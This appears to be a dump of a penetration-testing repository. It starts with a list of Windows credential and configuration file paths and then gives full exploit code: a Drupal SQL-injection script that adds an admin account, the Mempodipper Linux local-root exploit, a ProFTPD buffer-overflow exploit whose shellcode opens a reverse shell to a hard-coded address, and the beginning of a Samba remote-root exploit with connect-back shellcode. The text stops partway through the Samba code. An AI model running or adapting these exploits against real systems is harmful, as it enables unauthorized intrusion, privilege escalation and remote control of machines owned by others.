C:\Windows\system32\config\SecEvent.Evt 56 | C:\Windows\system32\config\default.sav 57 | C:\Windows\system32\config\security.sav 58 | C:\Windows\system32\config\software.sav 59 | C:\Windows\system32\config\system.sav 60 | C:\Windows\system32\config\regback\default 61 | C:\Windows\system32\config\regback\sam 62 | C:\Windows\system32\config\regback\security 63 | C:\Windows\system32\config\regback\system 64 | C:\Windows\system32\config\regback\software 65 | C:\Program Files\MySQL\MySQL Server 5.1\my.ini 66 | C:\Windows\System32\inetsrv\config\schema\ASPNET_schema.xml 67 | C:\Windows\System32\inetsrv\config\applicationHost.config 68 | C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log 69 | -------------------------------------------------------------------------------- /xpl/drupal_prior_7.32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # drupalSQLi.py -- a simple PoC for the Drupal SQLi vuln (CVE-2014-3704) 3 | # Author: Mike Czumak (T_v3rn1x) - @SecuritySift 4 | # You are free to share and/or reuse all or portions of this code as long as it's not for commercial purposes 5 | # Absolutely no warranty or promises of reliability, accuracy, or performance. Use at your own risk 6 | 7 | import sys 8 | import socket 9 | import urllib, urllib2 10 | import argparse 11 | import urlparse 12 | 13 | class print_colors: 14 | SUCCESS = '\033[92m' 15 | ERROR = '\033[91m' 16 | END = '\033[0m' 17 | 18 | 19 | ################################################# 20 | ############### Args/Usage ############### 21 | ################################################# 22 | 23 | def get_args(): 24 | 25 | parser = argparse.ArgumentParser( prog="drupalSQLi.py", 26 | formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50), 27 | epilog= ''' 28 | This script will exploit the Drupal SQL injection vulnerability (CVE-2014-3704) 29 | by adding a new user with admin privileges. Password will be `pwnd`.''') 30 | 31 | parser.add_argument("target", help="URL of target Drupal site") 32 | parser.add_argument("name", help="Username to Add") 33 | parser.add_argument("-u", "--uid", default="99999", help="User Id for new user (default = 99999)") 34 | parser.add_argument("-r", "--rid", default="3", help="rid for admin user (default = 3)") 35 | 36 | args = parser.parse_args() 37 | 38 | return args 39 | 40 | ################################################# 41 | ############### Print Function ############### 42 | ################################################# 43 | 44 | ''' universal print function with formatting ''' 45 | def print_msg (msgtype, msgcontent): 46 | endcolor = print_colors.END 47 | 48 | if msgtype == "error": 49 | startcolor = print_colors.ERROR 50 | print("%s[!] ERROR: %s%s" % (startcolor, msgcontent, endcolor)) 51 | 52 | elif msgtype == "success": 53 | startcolor = print_colors.SUCCESS 54 | print("%s[*] SUCCESS: %s%s" % (startcolor, msgcontent, endcolor)) 55 | 56 | else: 57 | print("%s" % (msgcontent)) 58 | 59 | ################################################# 60 | ############ EXPLOIT ############# 61 | ################################################# 62 | 63 | ''' SQL Injection Exploit to Add Admin User ''' 64 | 65 | def pwn_target(target, uname, uid, rid): 66 | target = target + "?destination=node" 67 | pass_hash = urllib.quote_plus("$S$DIkdNZqdxqh7Tmufxs8l1vAu0wdzxF//smWKAcjCv45KWjK0YFBg") # pass = pwnd 68 | create_user = "name[0;insert%20into%20users%20values%20("+uid+",'"+uname+"','"+pass_hash+"','pwnd@pwnd.pwn','','',NULL,0,0,0,1,NULL,'',0,'',NULL);#%20%20]=test&name[0]=test&pass=test&form_id=user_login_block&op=Log+in"; 69 | grant_privs = "name[0;insert%20into%20users_roles%20values%20("+uid+","+rid+");#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; 70 | 71 | try: 72 | req = urllib2.Request(target, create_user) 73 | res = urllib2.urlopen(req).read() 74 | req = urllib2.Request(target, grant_privs) 75 | res = urllib2.urlopen(req).read() 76 | print_msg("success", ("Admin user '%s' should now be added with password 'pwnd' and uid of %s\nNavigate to %s and login with these credentials" % (uname, uid, target))) 77 | 78 | except: 79 | print_msg("error", ( "[%s] %s%s" % (str(target), str(sys.exc_info()[0]), str(sys.exc_info()[1])))) 80 | 81 | 82 | ################################################# 83 | ############### Main ############### 84 | ################################################# 85 | 86 | def main(): 87 | print 88 | print '=============================================================================' 89 | print '| DRUPAL SQL INJECTIION DEMO (CVE-2014-3704) |' 90 | print '| Author: Mike Czumak (T_v3rn1x) - @SecuritySift |' 91 | print '=============================================================================\n' 92 | 93 | args = get_args() # get the cl args 94 | pwn_target(args.target.strip(), args.name.strip(), args.uid.strip(), args.rid.strip()) 95 | 96 | 97 | if __name__ == '__main__': 98 | main() 99 | -------------------------------------------------------------------------------- /xpl/mempodipper.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Mempodipper 3 | * by zx2c4 4 | * 5 | * Linux Local Root Exploit 6 | * 7 | * Rather than put my write up here, per usual, this time I've put it 8 | * in a rather lengthy blog post: http://blog.zx2c4.com/749 9 | * 10 | * Enjoy. 11 | * 12 | * - zx2c4 13 | * Jan 21, 2012 14 | * 15 | * CVE-2012-0056 16 | */ 17 | 18 | #define _LARGEFILE64_SOURCE 19 | #define _GNU_SOURCE 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | 36 | char *prog_name; 37 | const char *exploit_prog_path = "/bin/su"; 38 | const char *exploit_prog_name = "su"; 39 | 40 | int send_fd(int sock, int fd) 41 | { 42 | char buf[1]; 43 | struct iovec iov; 44 | struct msghdr msg; 45 | struct cmsghdr *cmsg; 46 | int n; 47 | char cms[CMSG_SPACE(sizeof(int))]; 48 | 49 | buf[0] = 0; 50 | iov.iov_base = buf; 51 | iov.iov_len = 1; 52 | 53 | memset(&msg, 0, sizeof msg); 54 | msg.msg_iov = &iov; 55 | msg.msg_iovlen = 1; 56 | msg.msg_control = (caddr_t)cms; 57 | msg.msg_controllen = CMSG_LEN(sizeof(int)); 58 | 59 | cmsg = CMSG_FIRSTHDR(&msg); 60 | cmsg->cmsg_len = CMSG_LEN(sizeof(int)); 61 | cmsg->cmsg_level = SOL_SOCKET; 62 | cmsg->cmsg_type = SCM_RIGHTS; 63 | memmove(CMSG_DATA(cmsg), &fd, sizeof(int)); 64 | 65 | if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len) 66 | return -1; 67 | close(sock); 68 | return 0; 69 | } 70 | 71 | int recv_fd(int sock) 72 | { 73 | int n; 74 | int fd; 75 | char buf[1]; 76 | struct iovec iov; 77 | struct msghdr msg; 78 | struct cmsghdr *cmsg; 79 | char cms[CMSG_SPACE(sizeof(int))]; 80 | 81 | iov.iov_base = buf; 82 | iov.iov_len = 1; 83 | 84 | memset(&msg, 0, sizeof msg); 85 | msg.msg_name = 0; 86 | msg.msg_namelen = 0; 87 | msg.msg_iov = &iov; 88 | msg.msg_iovlen = 1; 89 | 90 | msg.msg_control = (caddr_t)cms; 91 | msg.msg_controllen = sizeof cms; 92 | 93 | if ((n = recvmsg(sock, &msg, 0)) < 0) 94 | return -1; 95 | if (n == 0) 96 | return -1; 97 | cmsg = CMSG_FIRSTHDR(&msg); 98 | memmove(&fd, CMSG_DATA(cmsg), sizeof(int)); 99 | close(sock); 100 | return fd; 101 | } 102 | 103 | unsigned long ptrace_address() 104 | { 105 | int fd[2]; 106 | printf("[+] Creating ptrace pipe.\n"); 107 | pipe2(fd, O_NONBLOCK); 108 | printf("[+] Forking ptrace child.\n"); 109 | int child = fork(); 110 | if (child) { 111 | close(fd[1]); 112 | char buf; 113 | printf("[+] Waiting for ptraced child to give output on syscalls.\n"); 114 | for (;;) { 115 | wait(NULL); 116 | if (read(fd[0], &buf, 1) > 0) 117 | break; 118 | ptrace(PTRACE_SYSCALL, child, NULL, NULL); 119 | } 120 | 121 | printf("[+] Error message written. Single stepping to find address.\n"); 122 | struct user_regs_struct regs; 123 | for (;;) { 124 | ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); 125 | wait(NULL); 126 | ptrace(PTRACE_GETREGS, child, NULL, ®s); 127 | #if defined(__i386__) 128 | #define instruction_pointer regs.eip 129 | #define upper_bound 0xb0000000 130 | #elif defined(__x86_64__) 131 | #define instruction_pointer regs.rip 132 | #define upper_bound 0x700000000000 133 | #else 134 | #error "That platform is not supported." 135 | #endif 136 | if (instruction_pointer < upper_bound) { 137 | unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); 138 | if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) 139 | return instruction_pointer; 140 | } 141 | } 142 | } else { 143 | printf("[+] Ptrace_traceme'ing process.\n"); 144 | if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) { 145 | perror("[-] ptrace"); 146 | return 0; 147 | } 148 | close(fd[0]); 149 | dup2(fd[1], 2); 150 | execl(exploit_prog_path, exploit_prog_name, "not-a-valid-entry", NULL); 151 | } 152 | return 0; 153 | } 154 | 155 | unsigned long objdump_address() 156 | { 157 | char cmdbuf[256]; 158 | snprintf(cmdbuf, sizeof(cmdbuf), "objdump -d %s|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", exploit_prog_path); 159 | FILE *command = popen(cmdbuf, "r"); 160 | if (!command) { 161 | perror("[-] popen"); 162 | return 0; 163 | } 164 | char result[32]; 165 | fgets(result, 32, command); 166 | pclose(command); 167 | return strtoul(result, NULL, 16); 168 | } 169 | 170 | unsigned long find_address() 171 | { 172 | printf("[+] Ptracing %s to find next instruction without reading binary.\n", exploit_prog_name); 173 | unsigned long address = ptrace_address(); 174 | if (!address) { 175 | printf("[-] Ptrace failed.\n"); 176 | printf("[+] Reading su binary with objdump to find exit@plt.\n"); 177 | address = objdump_address(); 178 | if (address == ULONG_MAX || !address) { 179 | printf("[-] Could not resolve %s. Specify the exit@plt function address manually.\n", 180 | exploit_prog_path); 181 | printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name); 182 | exit(-1); 183 | } 184 | } 185 | printf("[+] Resolved call address to 0x%lx.\n", address); 186 | return address; 187 | } 188 | 189 | int su_padding() 190 | { 191 | printf("[+] Calculating su padding for [%s]\n", exploit_prog_path); 192 | char cmdbuf[256]; 193 | snprintf(cmdbuf, sizeof(cmdbuf), "%s this-entry-does-not-exist 2>&1", exploit_prog_path); 194 | FILE *command = popen(cmdbuf, "r"); 195 | if (!command) { 196 | perror("[-] popen"); 197 | exit(1); 198 | } 199 | char result[256]; 200 | fgets(result, 256, command); 201 | pclose(command); 202 | return strstr(result, "this-entry-does-not-exist") - result; 203 | } 204 | 205 | int child(int sock) 206 | { 207 | char parent_mem[256]; 208 | sprintf(parent_mem, "/proc/%d/mem", getppid()); 209 | printf("[+] Opening parent mem %s in child.\n", parent_mem); 210 | int fd = open(parent_mem, O_RDWR); 211 | if (fd < 0) { 212 | perror("[-] open"); 213 | return 1; 214 | } 215 | printf("[+] Sending fd %d to parent.\n", fd); 216 | send_fd(sock, fd); 217 | return 0; 218 | } 219 | 220 | int parent(unsigned long address) 221 | { 222 | if(!address) 223 | { 224 | address = find_address(); 225 | } 226 | int sockets[2]; 227 | printf("[+] Opening socketpair.\n"); 228 | if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) { 229 | perror("[-] socketpair"); 230 | return 1; 231 | } 232 | if (fork()) { 233 | printf("[+] Waiting for transferred fd in parent.\n"); 234 | int fd = recv_fd(sockets[1]); 235 | printf("[+] Received fd at %d.\n", fd); 236 | if (fd < 0) { 237 | perror("[-] recv_fd"); 238 | return 1; 239 | } 240 | printf("[+] Assigning fd %d to stderr.\n", fd); 241 | dup2(2, 15); 242 | dup2(fd, 2); 243 | int padding = su_padding(exploit_prog_path); 244 | unsigned long offset = address - padding; 245 | printf("[+] Seeking to offset 0x%lx. padding [%d]\n", offset, padding); 246 | lseek64(fd, offset, SEEK_SET); 247 | 248 | #if defined(__i386__) 249 | // See shellcode-32.s in this package for the source. 250 | char shellcode[] = 251 | "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3" 252 | "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68" 253 | "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89" 254 | "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd" 255 | "\x80"; 256 | #elif defined(__x86_64__) 257 | // See shellcode-64.s in this package for the source. 258 | char shellcode[] = 259 | "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48" 260 | "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f" 261 | "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7" 262 | "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50" 263 | "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; 264 | #else 265 | #error "That platform is not supported." 266 | #endif 267 | printf("[+] Executing %s with shellcode.\n", exploit_prog_name); 268 | execl(exploit_prog_path, exploit_prog_name, shellcode, NULL); 269 | } else { 270 | char sock[32]; 271 | sprintf(sock, "%d", sockets[0]); 272 | printf("[+] Executing child from child fork.\n"); 273 | execl("/proc/self/exe", prog_name, "-c", sock, NULL); 274 | } 275 | return 0; 276 | } 277 | 278 | int main(int argc, char **argv) 279 | { 280 | #define NEED_ADDR (0x1) 281 | #define NEED_PROG (0x2) 282 | 283 | prog_name = argv[0]; 284 | unsigned long address = 0; 285 | unsigned int flags = 0; 286 | int i; 287 | if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') 288 | return child(atoi(argv[2])); 289 | 290 | printf("===============================\n"); 291 | printf("= Mempodipper =\n"); 292 | printf("= by zx2c4 =\n"); 293 | printf("= Jan 21, 2012 =\n"); 294 | printf("===============================\n\n"); 295 | 296 | for(i = 1; i < argc; ++i) 297 | { 298 | if(argv[i][0] == '-') 299 | { 300 | switch(argv[i][1]) 301 | { 302 | case 'o': 303 | if(flags) 304 | goto exploit; 305 | flags = NEED_ADDR; 306 | break; 307 | case 'p': 308 | if(flags) goto exploit; 309 | flags = NEED_PROG; 310 | break; 311 | default: 312 | flags = 0; 313 | } 314 | } 315 | else if(flags & NEED_ADDR) 316 | { 317 | flags = 0; 318 | address = strtoul(argv[i], NULL, 16); 319 | } 320 | else if(flags & NEED_PROG) 321 | { 322 | flags = 0; 323 | exploit_prog_path = argv[i]; 324 | exploit_prog_name = strrchr(exploit_prog_path, '/'); 325 | if(!exploit_prog_name) 326 | exploit_prog_name = exploit_prog_path; 327 | else ++exploit_prog_name; 328 | } 329 | } 330 | 331 | exploit: 332 | return parent(address); 333 | 334 | } 335 | -------------------------------------------------------------------------------- /xpl/proftpd_1_3_3_a.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ## 3 | ##//############################################################################################################# 4 | ## ## # 5 | ## Vulnerability: ProFTPD IAC Remote Root Exploit ## Telnet IAC Buffer Overflow (Linux) # 6 | ## ## ProFTPD 1.3.2rc3 # 7 | ## Vulnerable Application: ProFTPD 1.3.3a ## This is a part of the Metasploit Module, # 8 | ## Tested on Linux 2.6.32-5-686 ## exploit/linux/ftp/proftp_telnet_iac # 9 | ## ## # 10 | ## Author: Muhammad Haidari ## Spawns a reverse shell to 10.11.0.55:1234 # 11 | ## Contact: ghmh@outlook.com ## # 12 | ## Website: www.github.com/muhammd ## # 13 | ## ## # 14 | ##//############################################################################################################# 15 | ## 16 | ## 17 | ## TODO: adjust 18 | ## 19 | ## Usage: python ProFTPD_exploit.py 20 | 21 | import sys,os,socket 22 | import struct 23 | 24 | #msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.44 LPORT=8080 CMD=/bin/sh PrependChrootBreak=true --smallest -f python -v payload -b '\x09\x0a\x0b\x0c\x0d\x20\xff' 25 | 26 | payload = "" 27 | payload += "\xb8\xf0\x5e\xe0\x8e\xd9\xce\xd9\x74\x24\xf4\x5f" 28 | payload += "\x2b\xc9\xb1\x1e\x31\x47\x12\x83\xef\xfc\x03\xb7" 29 | payload += "\x50\x02\x7b\x06\xa4\xf3\x5f\x02\x70\xac\x92\x52" 30 | payload += "\x16\x71\xa4\xb1\x8d\xae\xee\xf8\xd2\x38\xd7\x5a" 31 | payload += "\x1e\xba\xd9\x9a\xf0\xdd\x71\x34\xdf\xa8\x61\x22" 32 | payload += "\x22\xf2\xd5\xbe\x91\x84\xf4\x44\x43\xb8\x71\x61" 33 | payload += "\xcc\x0f\x01\xa0\x36\x78\xe1\x91\x8b\xd4\x8c\x17" 34 | payload += "\x85\x3a\xe0\x71\x58\x3c\x92\x24\xd2\x02\x58\x56" 35 | payload += "\x5b\x04\x9b\x3e\x56\xfd\x5b\x92\x0e\x03\x5c\xf5" 36 | payload += "\x5e\x8a\xbd\xb9\x39\xdd\x6c\xea\x76\xde\x07\xed" 37 | payload += "\xb4\x61\x45\x85\x28\x4d\x19\x3d\xdd\xbe\xf2\xdf" 38 | payload += "\x74\x48\xef\x4d\xd4\xc3\x11\xc1\xd1\x1e\x51" 39 | 40 | #payload = "" 41 | #payload += "\x6a\x1d\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" 42 | #payload += "\x13\x34\x38\x49\xe4\x83\xeb\xfc\xe2\xf4\x05\xf1" 43 | #payload += "\x78\x3f\x5e\x7e\x11\x29\xb4\x52\x74\x6d\xd7\x52" 44 | #payload += "\x6e\xbc\xf9\xb8\xc0\x3d\x6c\xf5\xc9\xd5\xf4\x68" 45 | #payload += "\x2f\x8c\x1a\x16\xc0\x07\x5e\x05\x10\x54\x38\xf5" 46 | #payload += "\xc9\x06\xce\x52\x74\x6d\xed\x60\x84\x64\x05\xe3" 47 | #payload += "\xbe\x07\x67\x7b\x1a\x8e\x36\xb1\xa8\x54\x52\xf5" 48 | #payload += "\xc9\x77\x6d\x88\x76\x29\xb4\x71\x30\x1d\x5c\x32" 49 | #payload += "\x42\xe4\x03\x50\x4b\xe4\x30\xea\xc0\x05\x84\x5e" 50 | #payload += "\x19\xb5\x67\x8b\x4a\x6d\xd5\xf5\xc9\xb6\x5c\x56" 51 | #payload += "\x66\x97\x5c\x50\x66\xcb\x56\x51\xc0\x07\x66\x6b" 52 | #payload += "\xc0\x05\x84\x33\x84\x64" 53 | 54 | # NOTE: All addresses are from the proftpd binary 55 | IACCount = 4096+16 56 | Offset = 0x102c-4 57 | Ret = "0x805a547" # pop esi / pop ebp / ret 58 | Writable = "0x80e81a0" # .data 59 | 60 | if len(sys.argv) < 2: 61 | print "\nUsage: " + sys.argv[0] + " \n" 62 | sys.exit() 63 | 64 | rop = struct.pack(" 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | char 43 | linux_connect_back[] = 44 | /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ 45 | "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" 46 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" 47 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" 48 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" 49 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68" 50 | "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50" 51 | "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68" 52 | "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73" 53 | "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0" 54 | "\x01\xcd\x80" 55 | 56 | /* connect back shellcode (port=0xb0ef) */ 57 | "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" 58 | "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" 59 | "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" 60 | "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1" 61 | "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" 62 | "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" 63 | "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f" 64 | "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" 65 | "\x01\xcd\x80"; 66 | 67 | char 68 | bsd_connect_back[] = 69 | /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ 70 | "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" 71 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" 72 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" 73 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" 74 | "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50" 75 | "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50" 76 | "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89" 77 | "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" 78 | "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0" 79 | "\x01\xcd\x80" 80 | 81 | /* connect back shellcode (port=0xb0ef) */ 82 | "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" 83 | "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" 84 | "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" 85 | "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80" 86 | "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52" 87 | "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31" 88 | "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54" 89 | "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; 90 | 91 | typedef struct { 92 | unsigned char type; 93 | unsigned char flags; 94 | unsigned short length; 95 | } NETBIOS_HEADER; 96 | 97 | typedef struct { 98 | unsigned char protocol[4]; 99 | unsigned char command; 100 | unsigned short status; 101 | unsigned char reserved; 102 | unsigned char flags; 103 | unsigned short flags2; 104 | unsigned char pad[12]; 105 | unsigned short tid; 106 | unsigned short pid; 107 | unsigned short uid; 108 | unsigned short mid; 109 | } SMB_HEADER; 110 | 111 | pid_t childs[50]; 112 | int LOOP = 1; 113 | struct sockaddr_in serv_addr; 114 | int sock_listen, client; 115 | int exploit_pid; 116 | int listen_pid; 117 | int port_listen = 45295; 118 | 119 | void 120 | usage(char *prog) 121 | { 122 | int i; 123 | 124 | fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n" 125 | "Connect back method, Xnuxer-Labs, 2003.\n" 126 | "Usage : %s \n" 127 | "Targets:\n" 128 | " 0 = Linux\n" 129 | " 1 = FreeBSD/NetBSD\n" 130 | " 2 = OpenBSD 3.0 and prior\n" 131 | " 3 = OpenBSD 3.2 - non-exec stack\n\n", prog); 132 | exit(1); 133 | } 134 | 135 | int 136 | Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 137 | { 138 | /* ripped from no1 */ 139 | 140 | int flags; 141 | int select_status; 142 | fd_set connect_read, connect_write; 143 | struct timeval timeout; 144 | int getsockopt_length = 0; 145 | int getsockopt_error = 0; 146 | struct sockaddr_in server; 147 | bzero(&server, sizeof(server)); 148 | server.sin_family = AF_INET; 149 | inet_pton(AF_INET, ip, &server.sin_addr); 150 | server.sin_port = htons(port); 151 | 152 | if((flags = fcntl(fd, F_GETFL, 0)) < 0) { 153 | close(fd); 154 | return -1; 155 | } 156 | 157 | if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { 158 | close(fd); 159 | return -1; 160 | } 161 | 162 | timeout.tv_sec = time_out; 163 | timeout.tv_usec = 0; 164 | FD_ZERO(&connect_read); 165 | FD_ZERO(&connect_write); 166 | FD_SET(fd, &connect_read); 167 | FD_SET(fd, &connect_write); 168 | 169 | if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) { 170 | if(errno != EINPROGRESS) { 171 | close(fd); 172 | return -1; 173 | } 174 | } 175 | else { 176 | if(fcntl(fd, F_SETFL, flags) < 0) { 177 | close(fd); 178 | return -1; 179 | } 180 | 181 | return 1; 182 | 183 | } 184 | 185 | select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout); 186 | 187 | if(select_status == 0) { 188 | close(fd); 189 | return -1; 190 | 191 | } 192 | 193 | if(select_status == -1) { 194 | close(fd); 195 | return -1; 196 | } 197 | 198 | if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) { 199 | if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) { 200 | getsockopt_length = sizeof(getsockopt_error); 201 | 202 | if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) { 203 | errno = ETIMEDOUT; 204 | close(fd); 205 | return -1; 206 | } 207 | 208 | if(getsockopt_error == 0) { 209 | if(fcntl(fd, F_SETFL, flags) < 0) { 210 | close(fd); 211 | return -1; 212 | } 213 | return 1; 214 | } 215 | 216 | else { 217 | errno = getsockopt_error; 218 | close(fd); 219 | return (-1); 220 | } 221 | 222 | } 223 | } 224 | else { 225 | close(fd); 226 | return 1; 227 | } 228 | 229 | if(fcntl(fd, F_SETFL, flags) < 0) { 230 | close(fd); 231 | return -1; 232 | } 233 | return 1; 234 | } 235 | 236 | int 237 | read_timer(int fd, unsigned int time_out) 238 | { 239 | 240 | /* ripped from no1 */ 241 | 242 | int flags; 243 | int select_status; 244 | fd_set fdread; 245 | struct timeval timeout; 246 | 247 | if((flags = fcntl(fd, F_GETFL, 0)) < 0) { 248 | close(fd); 249 | return (-1); 250 | } 251 | 252 | if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { 253 | close(fd); 254 | return (-1); 255 | } 256 | 257 | timeout.tv_sec = time_out; 258 | timeout.tv_usec = 0; 259 | FD_ZERO(&fdread); 260 | FD_SET(fd, &fdread); 261 | select_status = select(fd + 1, &fdread, NULL, NULL, &timeout); 262 | 263 | if(select_status == 0) { 264 | close(fd); 265 | return (-1); 266 | } 267 | 268 | if(select_status == -1) { 269 | close(fd); 270 | return (-1); 271 | } 272 | 273 | if(FD_ISSET(fd, &fdread)) { 274 | 275 | if(fcntl(fd, F_SETFL, flags) < 0) { 276 | close(fd); 277 | return -1; 278 | } 279 | 280 | return 1; 281 | 282 | } 283 | else { 284 | close(fd); 285 | return 1; 286 | 287 | } 288 | } 289 | 290 | int 291 | write_timer(int fd, unsigned int time_out) 292 | { 293 | 294 | /* ripped from no1 */ 295 | 296 | int flags; 297 | int select_status; 298 | fd_set fdwrite; 299 | struct timeval timeout; 300 | 301 | if((flags = fcntl(fd, F_GETFL, 0)) < 0) { 302 | close(fd); 303 | return (-1); 304 | } 305 | 306 | if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { 307 | close(fd); 308 | return (-1); 309 | } 310 | 311 | timeout.tv_sec = time_out; 312 | timeout.tv_usec = 0; 313 | FD_ZERO(&fdwrite); 314 | FD_SET(fd, &fdwrite); 315 | 316 | select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout); 317 | 318 | if(select_status == 0) { 319 | close(fd); 320 | return -1; 321 | } 322 | 323 | if(select_status == -1) { 324 | close(fd); 325 | return -1; 326 | } 327 | 328 | if(FD_ISSET(fd, &fdwrite)) { 329 | if(fcntl(fd, F_SETFL, flags) < 0) { 330 | close(fd); 331 | return -1; 332 | } 333 | return 1; 334 | } 335 | else { 336 | close(fd); 337 | return -1; 338 | } 339 | } 340 | 341 | int 342 | start_session(int sock) 343 | { 344 | char buffer[1000]; 345 | char response[4096]; 346 | char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00"; 347 | char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79" 348 | "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24"; 349 | 350 | NETBIOS_HEADER *netbiosheader; 351 | SMB_HEADER *smbheader; 352 | 353 | memset(buffer, 0x00, sizeof(buffer)); 354 | 355 | netbiosheader = (NETBIOS_HEADER *)buffer; 356 | smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); 357 | 358 | 